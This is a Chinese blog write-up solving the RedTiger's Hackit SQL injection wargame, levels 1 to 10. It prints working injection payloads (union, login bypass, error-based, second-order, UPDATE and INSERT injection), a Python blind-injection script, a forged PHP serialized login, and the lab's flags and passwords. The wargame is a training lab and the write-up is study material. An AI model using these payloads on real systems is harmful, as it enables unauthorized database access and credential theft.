#五#RedTiger's Hackit的wp

最新推荐文章于 2022-07-27 21:20:55 发布
最新推荐文章于 2022-07-27 21:20:55 发布
阅读量555 收藏 1
点赞数 1
分类专栏: 网安学习
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43476037/article/details/99101200
版权

做题链接:http://redtiger.labs.overthewire.org/

关于知识点整理

https://blog.csdn.net/weixin_43476037/article/details/87464475

wp

level 1
  • 表名已知:level1_users,点开Category发现注入点cat
    在这里插入图片描述
  • 构造?cat=1 union select 1,2,username,password from level1_users得到用户名和密码
    在这里插入图片描述
  • 输入得到flag和下一关
    在这里插入图片描述
  • 27cbddc803ecde822d87a7e8639f9315
level 2
  • 这个感觉是比1还要简单,就让你登录,直接尝试username=admin&password=1’or’1’='1就直接登进去了
    在这里插入图片描述
level 3
  • 给出了表名和提示:get an error
    在这里插入图片描述
  • 点开Admin的细节,发现url中user是一串密码,说明传入的参数会经过加密
    在这里插入图片描述
  • 再思考关于提示的报错,利用数组尝试
    在这里插入图片描述
  • 打开提示的urlcrypt.inc文件,发现加密解密函数
    在这里插入图片描述
  • 字段是猜的,看大佬的wp好像只能是猜,因为是对information_schema表做了限制,无法通过常规方式获取列名
  • 1' union select 1,2,3,4,5,6,7#加密后为: MDkwMTQ0MDY3MTcwMTQwMjI0MTQ0MDg2MTMwMTE0MTg0MTQ0MDc2MTcyMDExMDY5MjM4MDc3MTc1MDcwMDYyMTk5MjM1MjE5MDgxMjQ2MTUyMjA4MTc4MTEx
  • 得到显示位2 6 7 5 4
    在这里插入图片描述
  • ’ union select 1,password,2,3,4,5,6 from level3_users where username=’Admin加密得到
    usr=MDc2MTUxMDIyMTc3MTM5MjMwMTQ1MDI0MjA5MTAwMTc3MTUzMDc0MTg3MDk1MDg0MjQzMDE3MjUyMDI1MTI2MTU2MTc2MTMzMDAwMjQ2MTU2MjA4MTgyMDk2MTI5MjIwMDQ5MDUyMjMwMTk4MTk2MTg5MTEzMDQxMjQwMTQ0MDM2MTQwMTY5MTcyMDgzMjQ0MDg3MTQxMTE1MDY2MTUzMjE0MDk1MDM4MTgxMTY1MDQ3MTE4MDg2MTQwMDM0MDg1MTE4MTE4MDk5MjIyMjE4MDEwMTkwMjIwMDcxMDQwMjIw
  • 得到密码,输入得到flag
    在这里插入图片描述

####level 4

  • 进入,让你得到表里的keyword,里面有个click me,click以后发现url多了个id=1,明显是个注入点
    在这里插入图片描述
  • 又发现只有id=0和1才有回显,和id=其他数字都不变,所以应该有2列
    在这里插入图片描述
  • 看大佬的wp才知道,主界面给的提示说了是盲注,所以先判断字段长度:
  • id=1 and (select length(keyword) from hackit.level4_secret limit 0,1)=21 #测出来长度为21
  • 接下来要一位位的爆字段,因为有21位,所以最好是写脚本,而且这个还要带着cookies,代码参考网上的:
import requests as rq
url = "http://redtiger.labs.overthewire.org/level4.php"
cookies = {
    "level2login": "4_is_not_random",
    "level3login": "feed_your_cat_before_your_cat_feeds_you",
    "level4login": "there_is_no_bug"
}
payload = {'id': '1'}
url = rq.get(url, cookies=cookies, params=payload)
i = 1
keyword = []
print(url.url)
while i <= 21:
    for j in range(33, 127):
        poc = url.url+' and ascii(substr((select keyword from level4_secret),'+str(i)+',1))='+str(j)+'--+'
        target = rq.get(poc, cookies=cookies)
        if "Query returned 1 rows." in target.text:
            print(str(i)+":"+chr(j))
            keyword.append(chr(j))
            break
    i += 1

print(keyword)
  • 得到killstickswithbr1cks!
    在这里插入图片描述
level 5
  • 提示了过滤了substring, substr,(,),mid,密码用md5加密
    在这里插入图片描述
  • 他让你看一下登录错误,所以就显示了一下admin,发现被过滤了
    在这里插入图片描述
  • username 处填写正常语句时总是回显用户不存在,所以应该就是在 username 中进行绕过,根据提示 ‘the password is md5-crypted’ 猜测查询语句是根据用户名查询出数据库里的密码,然后将输入的 password 值进行 md5加密,然后进行对比
  • 通过’union select 1,2#测出共两列
    在这里插入图片描述
  • 利用union select 一组虚构的 username 和 passwprd 绕过登陆验证,所以令username:’ union select ‘1’, md5(‘1’)#&password=1得到flag
    在这里插入图片描述
level 6
  • 同样要用户名和密码,click以后能看到注入点:user=1
    在这里插入图片描述
  • 尝试user=1’报错
    [外链图片转存失败(img-FSt4fUmk-1565435541427)(https://i.loli.net/2019/08/05/jTrJeYbWlnL9CP1.png)]
  • 先尝试爆字段长度,order by 5没问题,order by 6报错,说明字段数为5
    在这里插入图片描述
  • 剩下的emmmmm,看大佬的wp,这个题是二次查询+16进制编码
  • 这里进行十六进制编码是因为,如果直接放到第一个查询语句中,会被认为是一个列名,如果带上双引号,如果第二个查询也是用双引号包裹的就会报错~所以转换为数字,然后前面加上0x是最佳选择。
  • 最终构造user=0 union select 1,0x61646d696e312720756e696f6e2073656c65637420312c757365726e616d652c332c70617373776f72642c352066726f6d206c6576656c365f757365727320776865726520757365726e616d653d2761646d696e2723,3,4,5 from level6_users#
    在这里插入图片描述
level 7
  • 先尝试搜索了一下1,1’,发现1’有详细报错,而且给了注入格式
    在这里插入图片描述
  • 正好刚学了updatexml报错,所以尝试构造报错:') UNION SELECT UPDATEXML(1,CONCAT(0x7e,(SELECT autor FROM level7_news LIMIT 1 OFFSET 2)),0) OR ('
    在这里插入图片描述
  • 得到username,输入得到flag
    在这里插入图片描述
level 8
  • 菜逼点进去一点思路没有,看别人wp才知道是靠’找到email有注入点(这么基础嘤嘤嘤)
    在这里插入图片描述
  • 但关于update的知识,不怎么了解,在mysql中的update的一个用法:如果在update中的语句,我们的写法如下:
    update users where username=email,password='123456' where username='admin';
  • 那么上面的这sql语句的执行效果就是将username为’admin’的记录修改为username为此记录的email,密码修改为123456。
  • 如果update语句中有fieldname1=fieldname2这样的语句就会将当前记录的fieldname2的值赋值到fieldname1上面。
  • email=hans%40localhost',name=password,icq='&name=Hans&icq=12345&age=25&edit=Edit
    在这里插入图片描述
  • email上面显示出密码,登陆得到flag
    在这里插入图片描述
level 9
  • insert 注入知识补充:关于insert,uodate,delete注入
  • 通过尝试发现在提交框里面存在注入点,输入1’会报错
    在这里插入图片描述
  • 猜测后台的sql语句写法 :insert into tablename(autor,title,text) values('[inputautor]','[inputtitle]','[inputtext]')。
    构造payload: 1'), ((select username from level9_users limit 1), (select password from level9_users limit 1),'1得到用户名和密码
    在这里插入图片描述
  • 输入得到flag
    在这里插入图片描述
level 10
  • 进入后只让你以TheMaster身份登录,发现url也没什么注入点,一脸懵逼
    在这里插入图片描述
  • 看了别人的提示,发现F12后有个hidden的input,里面有一串密码
    在这里插入图片描述
  • base64解密后得到
    a:2:{s:8:"username";s:6:"Monkey";s:8:"password";s:12:"0815password";}是PHP反序列化数据
  • 关于PHP反序列化总结
  • 再解密,PHP代码:
<?php
$a=unserialize('a:2:{s:8:"username";s:6:"Monkey";s:8:"password";s:12:"0815password";}');
var_dump($a);
?>
  • 执行得到
array(2) {
  ["username"]=>
  string(6) "Monkey"
  ["password"]=>
  string(12) "0815password"
}
  • 先尝试只把用户名改成TheMaster,发现不对
    在这里插入图片描述
  • 还需要把password改成true,构造:a:2:{s:8:"username";s:9:"TheMaster";s:8:"password";b:1;},base64编码得到: YSUzQTIlM0ElN0JzJTNBOCUzQSUyMnVzZXJuYW1lJTIyJTNCcyUzQTklM0ElMjJUaGVNYXN0ZXIlMjIlM0JzJTNBOCUzQSUyMnBhc3N3b3JkJTIyJTNCYiUzQTElM0IlN0Q=
  • login得到flag
    在这里插入图片描述
vircorns
关注
专栏目录
RedTiger‘s Hackit
Alita_lxz的博客
11-02 1445
RedTiger’s Hackit http://redtiger.labs.overthewire.org/ Level 1 Simple SQL-Injection 打开对应连接,是一个登录页面,先是告诉我们登录的用户名是什么,然后给了一个提示,把表名level1_users给出来了,现在就是要找注入点在哪里了,看到Category:后的1可以点击 点击之后出来cat=1,这就很明显了 试了一大顿,发现这个1后竟然不需要闭合引号,根据order by 得出表有4列 本来想爆一下列名,可能是有参数被
RedTiger‘s Hackit Level 1总结
滚滚是只小狐狸
02-14 1246
RedTiger’s Hackit Level 1总结 Level 1 题目: Welcome to level 1 Lets start with a simple injection. Target: Get the login for the user Hornoxe Hint: You really need one? omg -_- Tablename: level1_users Cat...
RedTiger's Hackit Level 1
GTMer的专栏
10-27 1183
测试发现cat = 1有返回,其他均报错 http://redtiger.labs.overthewire.org/level1.php?cat=1 其后接and 1 =1 和 and 1= 2 有不同反馈,存在注入 union select 1,2,3,4  发现存在4列,显示第3、4列 尝试从information_sechema读取数据,提示disabled。
RedTiger's Hackit Level 2
GTMer的专栏
10-27 756
username处注入 a' or 'a' = 'a' -- d    不行,应该是把后面frome table给注释掉的原因。 由于and的优先级高于or,因此在username后注入的or语句和password判断and在一起,不管用。 在password后注入or语句,get !
writeup--RedTiger's Hackit
charlie_heng的专栏
12-19 4194
RedTiger’s Hackit第一关首先点进Category 1 网址后面跟了?cat=1,很明显是一个sql注入 看了下还给了表名。。Tablename: level1_users 构造了下 https://redtiger.labs.overthewire.org/level1.php?cat=1 union select 1,2,username,password from le
RedTiger‘s Hackit练习sql漏洞
weixin_43939527的博客
10-18 622
level1 level1打开界面如下图 通过http://redtiger.labs.overthewire.org/level1.php?cat=1 ’ http://redtiger.labs.overthewire.org/level1.php?cat=1 and 1=1 http://redtiger.labs.overthewire.org/level1.php?cat=1 and 1=2 测试,发现这是一个数字型sql注入漏洞 知道存在漏洞后,我们通过order by判断数据表的列数 这个
SQL注入靶场 RedTiger通关教程(level1~level10)
0xuu的博客
07-07 1151
SQL注入靶场RedTiger's Hackit 通关教程;RedTiger通关教程(level1~level10)
Redtiger解题技巧(一)
Lorezon的博客
10-12 1888
(写这个博客本意就是为了自我总结,然后顺便试试新买的键盘。博主本人其实也就是个菜鸟,所以希望前辈们多多指导) 第一关: 根据提示,username=Hornoxe,给了Tablename: level1_users ok。我们先查看源码(看源码是我个人习惯,因为常常能在源码里发现意想不到的东西) 会发现一个有意思的东西:?cat=1 ok。返回答题关,构造语句 http://redtiger.la...
学习网站1
08-08
例如,RedTiger's Hackit、SQL_Tutorial和SQLZoo等平台提供了一系列的练习,让你能够了解如何构造SQL注入语句,以及如何防止这类攻击。此外,像Tasteless challenges这样的平台专门针对SQL注入进行训练,让你能够...
靶场笔记之sql注入石器篇1
快乐时光
04-22 542
前言 偶然发现了https://redtiger.labs.overthewire.org/网站,上面有关于sql注入的练习,分level1到level10,可依次进行练习。 本篇先介绍level1至level5的题目,可动手操作起来。 level 1 点击level 1进入https://redtiger.labs.overthewire.org/level1.php页,尝试了username和passwd没有发现任何问题,后来发现网站上有个Category:1的可...
php 0815 wechall,渗透测试演练平台RedTigers Hackit通关writeup以及wechall平台介绍
weixin_32394375的博客
03-18 505
本文转载自Redtiger Hackit WriteupRedTigers Hackit是一个训练SQL注入漏洞和PHP方面的网站,地址为https://redtiger.labs.overthewire.org/。相比hackinglab上面考察的常规SQL注入,redtiger上面的题目更多考察的是对于程序逻辑的思考,需要思考后台php代码是如何编写的。如果有一定的网站编写经验或者是网站的渗透...
RedTiger's Hackit(level2)
xz913400155的博客
12-11 500
第二关 简单的sql绕过 https://redtiger.labs.overthewire.org/ 进入第二关 给的目标是登入 提示是条件 然后就给了用户名及密码两个输入框 很容易就联想到输入内容就是查询语句中where的判断条件 账号密码一般都是用字符串格式 所以猜测where语句差不多是如下格式 where username=‘我们的输入’ and password=‘我们的输入’ 然...
RedTiger‘s Hackit -- level 10
qq_42303523的博客
07-27 1150
RegTiger's hackit level 10的解法和原理
SQL注入教程——(三)简单的注入尝试
热门推荐
hijack89的博客
07-26 1万+
本文将以简单的SQL注入实例来讲解SQL注入的基本思路与流程,当然本文实例只是注入的一种情况,初学者应重点理解思路,学会举一反三。GET与POST进行SQL注入攻击,大家还需要了解两种基本的 HTTP 请求方法:GET 和 POST。在客户机和服务器之间进行请求-响应时,两种最常被用到的方法是:GET 和 POST。 GET - 从指定的资源请求数据。 POST - 向指定的资源提交要被处理的数据
RedTiger's Hackit wirteup
a370793934的专栏
11-28 677
sql注入挑战 level1 简单注入,payload: http://redtiger.labs.overthewire.org/level1.php?cat=0 union select 1,2,username,password from level1_users 返回 Hornoxe thatwaseasy 登录后显示 You made it! You can raise...
redtiger 注入练习 writeup
dkfagk4904的博客
07-30 349
目前进度前两题,过程后续补上。 第一题: http://redtiger.labs.overthewire.org/level1.php 1 union select 1,2,username,password from level1_users You can raise your wechall.net score with this flag: XXXX The passw...
SQL注入大闯关笔记
Sean的博客
03-17 2712
目录前言一、SQL注入是什么?二、靶场是什么?三、挖掘漏洞1.redtiger靶场1.第一关2.第二关3.第三关总结 前言 随着国家对安全越来越重视,个人感觉每个人都需要了解一下安全方面的知识。学习安全,先要从靶场做起,说干就干。 一、SQL注入是什么? 所谓SQL注入式攻击,就是攻击者把SQL命令插入到Web表单的输入域或页面请求的查询字符串,欺骗服务器执行恶意的SQL命令。在某些表单中,用户输入的内容直接用来构造(或者影响)动态SQL命令,或作为存储过程的输入参数,这类表单特别容易受到SQL注入式攻
Redtiger Hackit Writeup
weixin_30326515的博客
08-09 814
RedTiger's Hackit Level 1 Welcome to level 1 Lets start with a simple injection. Target: Get the login for the user Hornoxe Hint: You really need one? omg -_- Tablename: level1_users ...
初试sql注入
xz913400155的博客
12-10 219
初次尝试sql注入 找到一个可以在线练习
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值